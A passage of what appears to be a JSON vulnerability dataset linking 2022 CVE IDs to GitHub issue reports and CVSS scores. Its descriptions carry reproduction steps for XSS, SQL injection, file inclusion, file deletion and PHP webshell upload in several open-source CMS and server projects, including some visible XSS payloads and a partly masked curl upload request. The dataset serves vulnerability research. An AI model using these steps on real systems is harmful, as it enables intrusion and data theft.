        "description": "Popcorn Time NUMBERTAG SS to RCE. Our security team found a security issue inside Popcorn Time NUMBERTAG We have reserved the CVETAG to refer to this issue. Attached below is the link to our responsible disclosure policy. URLTAG Bug description Popcorn Time NUMBERTAG has a Stored XSS in the APITAG field via the settings page. The APITAG configuration is set to on which allows the webpage to use APITAG features, an attacker can leverage this to run OS commands. CVSS NUMBERTAG ector: PATHTAG CVSS NUMBERTAG Base Score NUMBERTAG Steps to reproduce NUMBERTAG Open the Popcorn time application NUMBERTAG Go to settings NUMBERTAG Enable Show advanced settings NUMBERTAG Scroll down to the APITAG section NUMBERTAG Insert the following APITAG inside the APITAG field and click on Check for updates . APITAG NUMBERTAG Scroll down to the Database section and click on Export database NUMBERTAG The application will create a APITAG file with the current configuration NUMBERTAG Send the configuration to the victim NUMBERTAG The victim must go to APITAG and click on Import Database NUMBERTAG When the victim restarts the application the XSS will be triggered and will run the calc command. Screenshots and files FILETAG System Information Version: Popcorn Time NUMBERTAG Operating System: Windows NUMBERTAG N/A Build NUMBERTAG Installer: Popcorn Time NUMBERTAG win NUMBERTAG Setup.exe",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-25301",
        "Issue_Url_old": "https://github.com/metabench/jsgui-lang-essentials/issues/1",
        "Issue_Url_new": "https://github.com/metabench/jsgui-lang-essentials/issues/1",
        "Repo_new": "metabench/jsgui-lang-essentials",
        "Issue_Created_At": "2021-12-13T10:20:18Z",
        "description": "Prototype pollution in function jsgui lang APITAG jsgui lang essentials runs the risk of prototype contamination when using inherited attributes in the function APITAG the risk locate is in here URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25407",
        "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/21",
        "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/21",
        "Repo_new": "kishan0725/hospital-management-system",
        "Issue_Created_At": "2022-02-13T15:55:55Z",
        "description": "Persistent cross site scripting (XSS) in targeted towards web admin through FILETAG at via the parameter doctor.. Add Doctor info payload to Doctor Name of Add Doctor page to target FILETAG ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: APITAG Add Doctor info payload to Doctor Name of Add Doctor page to target FILETAG ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: APITAG FILETAG FILETAG Proof of concept APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-25408",
        "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/22",
        "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/22",
        "Repo_new": "kishan0725/hospital-management-system",
        "Issue_Created_At": "2022-02-13T15:57:12Z",
        "description": "Persistent cross site scripting (XSS) in targeted towards web admin through FILETAG at via the parameter dpassword.. Add Doctor info payload to Doctor Name of Add Doctor page to target FILETAG ,then use burpsuite get requests datas,change the 'dpassword' parameter to xss payload: APITAG Steps to exploit NUMBERTAG Navigate to FILETAG NUMBERTAG click APITAG Doctors ', use burpsuite to insert xss payload in the \"dpassword\" parameter NUMBERTAG Click APITAG Doctors\" FILETAG FILETAG Proof of concept APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-25409",
        "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/20",
        "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/20",
        "Repo_new": "kishan0725/hospital-management-system",
        "Issue_Created_At": "2022-02-13T15:53:58Z",
        "description": "Persistent cross site scripting (XSS) targeted towards web admin through FILETAG at via the parameter demail.. Persistent cross site scripting (XSS) in Hospital Management System NUMBERTAG targeted towards web admin through FILETAG at via the parameter demail. Add Doctor info payload to Doctor Name of Add Doctor page to target FILETAG ,then use burpsuite get requests datas,change the 'demail' parameter to xss payload: APITAG FILETAG FILETAG Proof of concept APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-25410",
        "Issue_Url_old": "https://github.com/maxsite/cms/issues/485",
        "Issue_Url_new": "https://github.com/maxsite/cms/issues/485",
        "Repo_new": "maxsite/cms",
        "Issue_Created_At": "2022-02-17T16:01:55Z",
        "description": "Stored Cross Site Scripting (XSS)(authenticated NUMBERTAG Stored Cross Site Scripting (XSS NUMBERTAG a stored cross site scripting (XSS) in maxsite cms targeted towards web admin through PATHTAG at via the parameter f_file_description NUMBERTAG Navigate to admin page, go to URLTAG update a FILETAG file FILETAG NUMBERTAG insert xss payload APITAG in the parameter f_file_description FILETAG NUMBERTAG click save You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time APITAG payload gets executed successfully and we'll get a pop up. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-25411",
        "Issue_Url_old": "https://github.com/maxsite/cms/issues/487",
        "Issue_Url_new": "https://github.com/maxsite/cms/issues/487",
        "Repo_new": "maxsite/cms",
        "Issue_Created_At": "2022-02-17T17:15:18Z",
        "description": "Remote Code Execution Vulnerability In APITAG CMS NUMBERTAG Description of Vulnerability The arbitrary file deletion vulnerability URLTAG can delete PATHTAG and then in /admin/options add the types of files allowed to be uploaded, it will allows hacker to bypass the protection system protection upload malicious php files and execute malicious php code,eventually leading to a command execution vulnerability Proof of concept APITAG NUMBERTAG in PATHTAG a zagruzki add 'php' in \" \u0420\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043d\u044b\u0435 \u0442\u0438\u043f\u044b \u0444\u0430\u0439\u043b\u043e\u0432 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043e\u043a\" FILETAG NUMBERTAG Use the method of URLTAG to delete PATHTAG FILETAG NUMBERTAG upload php files whice containing malicious code: APITAG FILETAG NUMBERTAG open the php file PATHTAG then rce FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25412",
        "Issue_Url_old": "https://github.com/maxsite/cms/issues/486",
        "Issue_Url_new": "https://github.com/maxsite/cms/issues/486",
        "Repo_new": "maxsite/cms",
        "Issue_Created_At": "2022-02-17T16:55:54Z",
        "description": "Multiple Arbitrary File Deletion vulnerabilities. Description of Vulnerability Multiple Arbitrary File Deletion vulnerabilities in maxsite cms NUMBERTAG targeted towards web admin through PATHTAG at the parameter dir and deletefile affected source code: at NUMBERTAG in PATHTAG FILETAG when the APITAG function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Proof of concept APITAG NUMBERTAG in URLTAG select file to delete and Send the request directly through burp FILETAG FILETAG NUMBERTAG APITAG can traverse the directory to delete any file FILETAG NUMBERTAG APITAG APITAG Additional The same problem occurs in PATHTAG at the parameter f_check_files",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-25462",
        "Issue_Url_old": "https://github.com/bbuhrow/avx-ecm/issues/1",
        "Issue_Url_new": "https://github.com/bbuhrow/avx-ecm/issues/1",
        "Repo_new": "bbuhrow/avx-ecm",
        "Issue_Created_At": "2022-01-18T02:39:11Z",
        "description": "There are some bugs in this avx ecm.. FILETAG I merge all dependences of yafu. When I want to factor this number. I will receive segment falut. >> APITAG Following text is the message from gdb. CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25464",
        "Issue_Url_old": "https://github.com/doramart/DoraCMS/issues/255",
        "Issue_Url_new": "https://github.com/doramart/doracms/issues/255",
        "Repo_new": "doramart/doracms",
        "Issue_Created_At": "2022-02-19T12:51:51Z",
        "description": "There is a stored xss vulnerability exists in APITAG FILETAG Step NUMBERTAG enter the JS code < script > alert NUMBERTAG APITAG in the template, as shown in the following figure. FILETAG FILETAG Step NUMBERTAG after saving the changes, visit ERRORTAG HTML and index HTML, trigger JS code execution pop up window. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-25465",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2136",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/2136",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2022-01-29T16:21:46Z",
        "description": "stack overflow APITAG in APITAG Environment APITAG Build APITAG Proof of concept ERRORTAG Stack Dump ERRORTAG Credit Q1IQ( APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-25484",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/715",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/715",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2022-02-15T07:37:33Z",
        "description": "Bug] Reachable assertion in APITAG Describe the bug The assertion APITAG in APITAG at tree.c is reachable when the user uses tcpprep to open a crafted pcap file. The variable APITAG is assigned in APITAG at get.c. URLTAG However, when the datalink is APITAG or ERRORTAG , APITAG is not assigned, and the assertion is triggered. URLTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Get the Tcpreplay source code (master NUMBERTAG f NUMBERTAG and compile it NUMBERTAG Run command: APITAG The POC file could be downloaded here: [POC_file URLTAG Expected behavior Program reports assertion failure and is terminated. Screenshots FILETAG The GDB report: CODETAG System (please complete the following information): OS: Ubuntu OS version NUMBERTAG bit Tcpreplay Version NUMBERTAG master NUMBERTAG f NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-25485",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/24",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/24",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2022-02-16T08:43:24Z",
        "description": "Unauthorized local file inclusion (LFI) vulnerability exists via the url parameter in FILETAG . poc APITAG APITAG analysis FILETAG line NUMBERTAG APITAG APITAG and $cuppa >POST ERRORTAG go on ERRORTAG so the post url without and lfi protected filter Repair suggestions you can check url ,for example check if it has .. then refuse this request",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-25486",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/25",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/25",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2022-02-16T08:54:20Z",
        "description": "Unauthorized local file inclusion (LFI) vulnerability exists via the APITAG parameter in FILETAG . poc APITAG FILETAG analysis location: FILETAG line NUMBERTAG APITAG APITAG and $cuppa >POST ERRORTAG go on ERRORTAG so the post APITAG without any lfi protected filter Repair suggestions you can check APITAG ,for example check if it has .. then refuse this request",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-25486",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/15",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/15",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2022-01-04T14:09:43Z",
        "description": "Non authenticated local file inclusion. Greetings, I found a LFI vulnerability in APITAG How is disclosure process exactly done. Can you provide me an email where I can contact you with the details.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-25487",
        "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/256",
        "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/256",
        "Repo_new": "thedigicraft/atom.cms",
        "Issue_Created_At": "2022-02-16T13:50:57Z",
        "description": "An Unauthorized Remote Code Execution vulnerability exists in APITAG NUMBERTAG An Unauthorized attacker can upload arbitrary file in the FILETAG and executing it on the server reaching the RCE. poc ERRORTAG APITAG you can find the filename in respose. APITAG then you get a shell in APITAG APITAG analysis file FILETAG line NUMBERTAG without any protect for upload files extension APITAG Repair suggestions set some filter about files extension",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25494",
        "Issue_Url_old": "https://github.com/g33kyrash/Online-Banking-system/issues/16",
        "Issue_Url_new": "https://github.com/g33kyrash/online-banking-system/issues/16",
        "Repo_new": "g33kyrash/online-banking-system",
        "Issue_Created_At": "2022-02-17T07:58:38Z",
        "description": "There is a SQL injection vulnerability in FILETAG . poc First visit FILETAG APITAG Enter any user and APITAG burp to capture packets FILETAG Modify the data package as follows, save as APITAG ERRORTAG execute APITAG APITAG APITAG analysis file FILETAG line NUMBERTAG ERRORTAG without any filter for username and password",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25495",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/26",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/26",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2022-02-19T14:51:30Z",
        "description": "An Remote Code Execution vulnerability exists in Cuppa cms via file upload function. An attacker can upload arbitrary file via the PATHTAG and executing it on the server reaching the RCE. poc after login in setting module,add 'php' as Allowed extensions APITAG APITAG then upload a php file and use burp or other soft intercept request and send to repeater change the path as \"../\" APITAG uploadfile name can be seen in response APITAG as we can know, APITAG is as same as APITAG so visit APITAG you can getshell APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25497",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/28",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/28",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2022-02-19T16:22:14Z",
        "description": "Unauthorized Arbitrary File Read vulnerability exists in APITAG An Unauthorized attacker can read arbitrary file via copy function poc CODETAG then visit APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25498",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/29",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/29",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2022-02-19T17:39:40Z",
        "description": "Unauthorized Remote Code Execution vulnerability exists in APITAG via APITAG function. An Unauthorized attacker can execute arbitrary php code via ERRORTAG , APITAG function poc ERRORTAG then APITAG is your webshell password is cmd APITAG analysis when parameter file is APITAG after base NUMBERTAG decode is ERRORTAG we can code inject into the last line, and the final result is our shellcode injected to the APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25505",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/27",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/27",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2022-02-16T12:15:56Z",
        "description": "taocms NUMBERTAG SQL injection exists in the background. Vulnerability file address: PATHTAG FILETAG It can be seen that the update function does not filter the id. After obtaining the id with the columnsdata function, it is brought into the updatelist function to update the data. FILETAG Then bring the id into the getlist function for the select query FILETAG Finally, the id is brought into the updatelist function for an update As can be seen from the above, a total of three SQL statements were executed, and none of the ids were filtered. Vulnerability to reproduce: APITAG the environment locally, and then enter the background APITAG the Manage section, then click Edit, and finally click Submit FILETAG FILETAG APITAG use burpsuite to capture a packet and send the packet to the repeater module FILETAG APITAG vulnerability variable is id, and the payload is constructed as: and APITAG Click send, you can see that the successful delay is NUMBERTAG seconds\uff0cas mentioned earlier, this is because the SQL statement is executed NUMBERTAG times FILETAG Repair suggestion: filter by id",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25506",
        "Issue_Url_old": "https://github.com/FreeTAKTeam/UI/issues/27",
        "Issue_Url_new": "https://github.com/freetakteam/ui/issues/27",
        "Repo_new": "freetakteam/ui",
        "Issue_Created_At": "2022-02-16T09:38:15Z",
        "description": "SQL Injection on APITAG The API endpoint APITAG contains a SQL Injection into the APITAG Database that is handling the authentication process of the APITAG In order to exploit this vulnerability the attacker need to possess a valid API key, which can either be leaked through the XSS from an End User Device, or given as a part of the UAV Operator ability which broadcasts the GPS and Video feed of a UAV Drone. From the SQL Injection it is possible to list all the Username, APITAG and Clear Text passwords in the database. Proof of Concept Posting the follwing snippet into a web browsers console will trigger the SQL Injection and return the name and password for each user in the APITAG table. ERRORTAG Will return the following response: FILETAG Which clearly shows the database results in clear text.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-25507",
        "Issue_Url_old": "https://github.com/FreeTAKTeam/UI/issues/28",
        "Issue_Url_new": "https://github.com/freetakteam/ui/issues/28",
        "Repo_new": "freetakteam/ui",
        "Issue_Created_At": "2022-02-16T09:44:15Z",
        "description": "XSS through Emergency Alert. In the APITAG UI there is a function to create and view Emergency Alerts that are originating from either the End User Device or from the UI itself. Both Avenues are susceptible to a Stored Cross Site scripting vulnerability in the Callsign parameter. Web Interface In the case of a XSS in the APITAG it is as simple as having a callsign with the payload of ERRORTAG which will trigger the Emergency function and display the emergency in the APITAG FILETAG FILETAG End User Device What's more interesting of a scenario is that it is possible to push Emergencies from any of the EUDs, these can range from a NUMBERTAG TIC APITAG in Contact) or similar. This can be chained together with the API keys leakage in the response in order to obtain a server APITAG key for further exploitation, which can take a normal user in the field to a Web Server admin FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-25508",
        "Issue_Url_old": "https://github.com/FreeTAKTeam/FreeTakServer/issues/291",
        "Issue_Url_new": "https://github.com/freetakteam/freetakserver/issues/291",
        "Repo_new": "freetakteam/freetakserver",
        "Issue_Created_At": "2022-02-16T09:39:27Z",
        "description": "Unauthenticated Public APITAG Endpoint. In the APITAG there is also the Endpoint PATHTAG which is unauthenticated. While this might not seem interesting at first, it is possible to broadcast new routes (suggested tracks to take) to every End User Device (EUD) connected to the server. This can create two issues, either create a Denial of Service situation where a malicious user can fill the entire map with routes, making it impossible to use the map in the EUD. The second scenario might be to create a route on which possible users might take and therefor control some of the paths and direct users into bad situations. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25510",
        "Issue_Url_old": "https://github.com/FreeTAKTeam/FreeTakServer/issues/292",
        "Issue_Url_new": "https://github.com/freetakteam/freetakserver/issues/292",
        "Repo_new": "freetakteam/freetakserver",
        "Issue_Created_At": "2022-02-16T09:47:16Z",
        "description": "Hardcoded Flask Secrets Key APITAG Escalation\". In the sourcecode there are NUMBERTAG relevant places that the Flask Secrets Key are hardcoded. Flask signs all their client sessions with this secret key, usually defined in an APITAG Variable_. In this case though there's these three places that these are hardcoded into. FILETAG This gives a malicious user the ability to sign their own cookies (using for example: Flask Unsign URLTAG , and internally change the UID of the current user and assume any other user, for example UID NUMBERTAG which is the Admin. APITAG Escalation) Another interessting issue that you run into aswell is that having two Flask servers with the same _secret key_ makes it possible for a user to reuse a UID NUMBERTAG cookie from Server A, and apply that cookie to Server B logging in to the same UID NUMBERTAG APITAG APITAG bypass).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-25511",
        "Issue_Url_old": "https://github.com/FreeTAKTeam/UI/issues/29",
        "Issue_Url_new": "https://github.com/freetakteam/ui/issues/29",
        "Repo_new": "freetakteam/ui",
        "Issue_Created_At": "2022-02-16T09:49:50Z",
        "description": "Arbitrary File Write APITAG UI APITAG Code Execution). User Interface Datapackage From the APITAG it is possible to (once logged in) upload APITAG directly to the server so that it is possible to download the zipped files on the EUD in the field. The route APITAG takes an argument APITAG which is not sanitized for either the Path or the Filename outside of the UI, which creates the issues that you can place any file, anywhere on the system. Albeit going this route will add some junk XML data into the end of the file, this making it extremely hard to achieve code execution through Python or Flask Templating. This was achieved using a transparent proxy to catch and modify the webrequest, but can also be achieved using something like FILETAG Proof Of Concept Request through Burpsuite: FILETAG File on system: FILETAG APITAG that the webserver is at that moment run as root, APITAG Recommended_) Bash equivalent APITAG `bash curl i s k X POST H APITAG APITAG H APITAG Bearer APITAG H APITAG Type: multipart/form data; boundary= APITAG H APITAG Encoding: gzip, deflate' data binary PATHTAG form data; name= assetfile ; filename= test.ext APITAG Type: PATHTAG PATHTAG ' URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-25512",
        "Issue_Url_old": "https://github.com/FreeTAKTeam/UI/issues/26",
        "Issue_Url_new": "https://github.com/freetakteam/ui/issues/26",
        "Repo_new": "freetakteam/ui",
        "Issue_Created_At": "2022-02-16T09:36:43Z",
        "description": "API and Websocket Keys Leakage. The APITAG leaks the APITAG and Websocket tokens in the javascript source code! These should not be reflected back to the user as that can lead to unintended requests through for example XSS. API Bearer Token FILETAG Websocket Token FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25523",
        "Issue_Url_old": "https://github.com/Typesetter/Typesetter/issues/697",
        "Issue_Url_new": "https://github.com/typesetter/typesetter/issues/697",
        "Repo_new": "typesetter/typesetter",
        "Issue_Created_At": "2022-03-23T20:18:51Z",
        "description": "CSRF Vulnerabilities in APITAG [ CVETAG ]. APITAG NUMBERTAG was discovered to contain a Cross Site Request Forgery (CSRF) which is exploited via a crafted POST request. Vulnerability Type Cross Site Request Forgery (CSRF) Vendor of Product APITAG Affected Product Code Base APITAG NUMBERTAG are effected Affected Component All the POST requests Attack Type Remote Impact Escalation of Privileges true Attack Vector CODETAG Discoverer Danish Tariq Reference FILETAG URLTAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-25568",
        "Issue_Url_old": "https://github.com/ccrisan/motioneye/issues/2292",
        "Issue_Url_new": "https://github.com/motioneye-project/motioneye/issues/2292",
        "Repo_new": "motioneye-project/motioneye",
        "Issue_Created_At": "2022-02-17T17:39:27Z",
        "description": "Lack of a default user password exposes config file which contains potentially sensitive information. Last time I posted (in APITAG maybe) about the default lack of admin password/easily bruteforced password, leaving users open to remote code execution, and it was seen as a non issue, so this may also be a non issue to you. If a \"user\" password is unset, even if an \"admin\" password is set, the config file at the PATHTAG endpoint remains viewable to anybody that has access to the APITAG instance. Using Shodan, I've found a large amount of them open to the public. This config file contains some highly sensitive information such as email addresses and passwords for various services where uploading of files occur such as external FTP, SFTP, gmail, gdrive, telegram, and potentially others. I just wanted to post this so people know that even if they set an \"admin\" password, they also need to set a \"user\" password especially if their config contains sensitive information like credentials for an upload service and even more especially if they also expose their APITAG instance to the internet.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25574",
        "Issue_Url_old": "https://github.com/aqianhei/aqian/issues/1",
        "Issue_Url_new": "https://github.com/aqianhei/aqian/issues/1",
        "Repo_new": "aqianhei/aqian",
        "Issue_Created_At": "2022-02-18T06:39:38Z",
        "description": "douphp. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-25585",
        "Issue_Url_old": "https://github.com/union-home/unioncms/issues/5",
        "Issue_Url_new": "https://github.com/union-home/unioncms/issues/5",
        "Repo_new": "union-home/unioncms",
        "Issue_Created_At": "2022-02-19T11:07:31Z",
        "description": "Stored XSS exists. APITAG problem is in system settings basic settings default settings third party code write\uff1a APITAG alert NUMBERTAG APITAG Save, open the home page and the XSS code will pop up The problem is as follows\uff1a FILETAG APITAG background content management all management modules add a piece of content insert video in the content, write\uff1aimg src=\"x\" onerror=\"alert NUMBERTAG FILETAG Save, open the corresponding foreground article and background article will pop up XSS code The problem is as follows\uff1a FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-25590",
        "Issue_Url_old": "https://github.com/javahuang/SurveyKing/issues/7",
        "Issue_Url_new": "https://github.com/javahuang/surveyking/issues/7",
        "Repo_new": "javahuang/surveyking",
        "Issue_Created_At": "2022-02-20T04:55:08Z",
        "description": "There is a logout logic vulnerability in the background. Version NUMBERTAG First, log in to the background normally and send query requests. Pay attention to cookies FILETAG Then click the exit login button. At this time, the back end code does not delete the user's session, but just jumps to the login page. You can see that the requested data can still be obtained normally with the previous cookie. Then the attacker can log in to the system again with the help of the browser cache when the user exits. FILETAG Repair suggestion: when exiting the login, delete the user's session first, and then jump to the login page.",
